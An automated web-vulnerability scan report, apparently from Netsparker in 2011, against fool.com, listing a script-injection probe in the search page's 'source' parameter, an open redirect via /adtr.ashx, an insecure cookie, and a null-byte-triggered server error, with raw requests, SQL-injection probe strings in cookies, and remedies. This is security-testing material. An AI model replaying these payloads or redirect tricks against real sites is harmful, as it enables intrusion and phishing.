<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TickerRankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/PlayerRankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TagRankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/FeedBack.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/ira/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">IRAs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/401k/401kintro-is-your-retirement-plan-foolish.aspx" class="qsAdd qs-source-ifltnvsnv0000001">401(k)s, Etc.</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/assetallocation/introduction-to-asset-allocation.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Asset Allocation</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://boards.fool.com/" class="qsAdd qs-source-ifltnvpnv0000001"><span>Boards</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/BestOf.asp" class="qsAdd qs-source-ifltnvsnv0000001">Best Of</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/favoriteboards.asp" class="qsAdd qs-source-ifltnvsnv0000001">Favorites &..

- /search/solr.aspx

/search/solr.aspx

http://www.fool.com/search/solr.aspx?sort=date&source=%27%22%20ns=%20alert(0x001D4C)%20

Parameters

Parameter	Type	Value
sort	GET	date
source	GET	'" ns= alert(0x001D4C)

Request

GET /search/solr.aspx?sort=date&source=%27%22%20ns=%20netsparker(0x001D4C)%20 HTTP/1.1
Referer: http://www.fool.com/search/solr.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=data:; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2Ffoolwatch%2Ffoolwatch%2Easpx; Fool=V=5&R=false&Uid=1561337428&Username=; Sookie=source=data:&fy=false&ybls=0; Wookie=Ref=http%3a%2f%2fwww.fool.com%2ffoolwatch%2ffoolwatch.aspx; Tookie=T=78008736778680620530400466606400; v1st=FA7AFE88A3069011; Fool=Uid=1561337597&Username=&V=5&DesktopPreference=false&R=false; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&fy=false&ybls=1; TlM3NzU0NTYxNDQ2NTc1&fy=false&ybls=0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=data:&fy=false&ybls=0; domain=.fool.com; path=/,Tookie=T=78008736778680620530400466606400; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:41:31 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head><title>
Searching for: | Fool.com | Stock Investing Advice | Stock Research
</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta property="fb:app_id" content="50808187550" /> <meta http-equiv="imagetoolbar" content="no" /> <link rel="image_src" href="http://g.foolcdn.com/art/ratings/avatars/img_194.gif" /> <link href="http://s.foolcdn.com/common/css/fool.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Usmf.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Bridge.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Search.css?v=83256" rel="stylesheet" type="text/css" media="all" />
<script type='text/javascript'>
var isUserNameCreated = false;
var isLoggedIn = false;
var hasUserName = false;
var isRegistered = false;
</script><script src="http://j.foolcdn.com/common/js/prototype_fool.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/fx_usmf.min.js?v=83256" type="text/javascript"></script>  <script src="http://j.foolcdn.com/common/js/Ajax/rsh.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/Search/Search.Faceted.js?v=83256" type="text/javascript"></script> <script type="text/javascript"> window.dhtmlHistory.create({ toJSON: function(o) { return Object.toJSON(o); } , fromJSON: function(s) { return s.evalJSON(); } }); </script> </head> <body id="ctl01_ctl00_cphContent_Body"> <div id="header" class="navCellA"> <div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">The World's Greatest Investing Community</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="/Landing/TMF/Registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/Fool_Labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/Profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/FavoriteBoards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/Account/Index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TickerRankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/PlayerRankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TagRankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/FeedBack.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/ira/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">IRAs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/401k/401kintro-is-your-retirement-plan-foolish.aspx" class="qsAdd qs-source-ifltnvsnv0000001">401(k)s, Etc.</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/assetallocation/introduction-to-asset-allocation.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Asset Allocation</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://boards.fool.com/" class="qsAdd qs-source-ifltnvpnv0000001"><span>Boards</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/BestOf.asp" class="qsAdd qs-source-ifltnvsnv0000001">Best Of</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/favoriteboards.asp" class="qsAdd qs-source-ifltnvsnv0000001">Favorites &..

Cookie Not Marked As Secure

1 TOTAL

IMPORTANT

CONFIRMED

A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

- /Account/

/Account/ CONFIRMED

https://www.fool.com/Account/

Identified Cookie

Sookie

Request

GET /Account/ HTTP/1.1
Referer: https://www.fool.com/Account/Index.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=1; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /Redirect.aspx?ReturnUrl=%2fAccount%2fIndex.aspx
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=1; domain=.fool.com; path=/,Tookie=T=62122750254005380745485366172445; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:27:36 GMT
Content-Encoding:
Transfer-Encoding: chunked

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fRedirect.aspx%3fReturnUrl%3d%252fAccount%252fIndex.aspx">here</a>.</h2>
</body></html>

Open Redirection

1 TOTAL

MEDIUM

CONFIRMED

Open Redirection occurs when vulnerable web page is being redirected to another web page via a user controllable input.

Impact

An attacker can use this vulnerability to redirect users to other malicious web sites which can be used for phishing and similar attacks.

Remedy

Where possible do not use users' input for URLs.
If you definitely need dynamic URLs, Make a list of valid accepted URLs and do not accept other URLs.
Ensure that you only accept URLs which are located on accepted domains.

External References

- /adtr.ashx

/adtr.ashx CONFIRMED

http://www.fool.com/adtr.ashx?to=//www.netsparker.com?

Parameters

Parameter	Type	Value
to	GET	//www.netsparker.com?

Request

GET /adtr.ashx?to=//www.netsparker.com? HTTP/1.1
Referer: http://www.fool.com/press/about.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=data:&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2FLanding%2FTMF%2FRegistration%2Easpx; Sookie=source=data:&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fwww.fool.com%2fpress%2fabout.htm; Tookie=T=23116735450145217431606070417678; v1st=CCE2204436E513CA; Fool=Uid=1561337332&Username=&V=5&DesktopPreference=false&R=false; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&fy=false&ybls=1; TlM3NzU0NTYxNDQ2NTc1&fy=false&ybls=0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: //www.netsparker.com?
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=data:&fy=false&ybls=1; domain=.fool.com; path=/,Tookie=T=23116735450145217431606070417678; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:39:57 GMT
Content-Encoding:
Transfer-Encoding: chunked

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%2fwww.netsparker.com%3f">here</a>.</h2>
</body></html>

Internal Server Error

1 TOTAL

LOW

CONFIRMED

The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.

- /fool/free-report/15/rb-billgates-displayexternal-68077.aspx

/fool/free-report/15/rb-billgates-displayexternal-68077.aspx CONFIRMED

http://www.fool.com/fool/free-report/15/rb-billgates-displayexternal-68077.aspx?aid=rb-billgates-dis..

Parameters

Parameter	Type	Value
aid	GET	rb-billgates-displayexternal-68077.aspx
source	GET	irbsitvid0900001

Request

GET /fool/free-report/15/rb-billgates-displayexternal-68077.aspx?aid=rb-billgates-displayexternal-68077.aspx%00&source=irbsitvid0900001 HTTP/1.1
Referer: http://www.fool.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3A%2F%2Fwww%2Efool%2Ecom%2F; Sookie=source=&fy=false&ybls=1; Wookie=Ref=http%3a%2f%2fwww.fool.com%2f; Tookie=T=66787385684188480836065467353107; v1st=E58FB97616CEBA33; Fool=Uid=1561335138&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=irbsitvid0900001&fy=false&ybls=1; domain=.fool.com; path=/,Tookie=T=66787385684188480836065467353107; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:31:10 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head><title>
Fool.com: Stock Investing Advice | Stock Research
</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta property="fb:app_id" content="50808187550" /> <meta http-equiv="imagetoolbar" content="no" /> <link rel="image_src" href="http://g.foolcdn.com/art/ratings/avatars/img_194.gif" /> <link href="http://s.foolcdn.com/common/css/fool.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Usmf.css?v=83256" rel="stylesheet" type="text/css" media="all" />

<style type="text/css">
h1.error, div.grid h1.error {
font-weight:bold;
margin-top:1.2ex;
margin-bottom:11px;
margin-left:0;
color: #aa0c00;
}
html h2 a, html h2 a:visited {
font-size:100%;
font-family: inherit;
color: inherit;
}
html h2 a:hover {
text-decoration:none;
}
#more-links {
border-bottom: 1px dotted #ccc;
border-top: 1px dotted #ccc;
margin-top: 6ex;
margin-bottom:1em;
padding: 2ex 0;
}
.muted, a.muted, .muted a {
color: #888;
}
a.muted:hover,
.muted a:hover {
color: #666;
}
</style>

<link href="http://s.foolcdn.com/common/css/Bridge.css" rel="stylesheet" type="text/css" media="all" />

<link href="http://s.foolcdn.com/css/Article.css" rel="stylesheet" type="text/css" media="all" />

<script type='text/javascript'>
var isUserNameCreated = false;
var isLoggedIn = false;
var hasUserName = false;
var isRegistered = false;
</script><script src="http://j.foolcdn.com/common/js/prototype_fool.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/fx_usmf.min.js?v=83256" type="text/javascript"></script>  </head> <body id="ctl00_ctl00_cphContent_Body"> <div id="header" class="navCellA"> <div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">Market-Beating Community Intelligence </span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
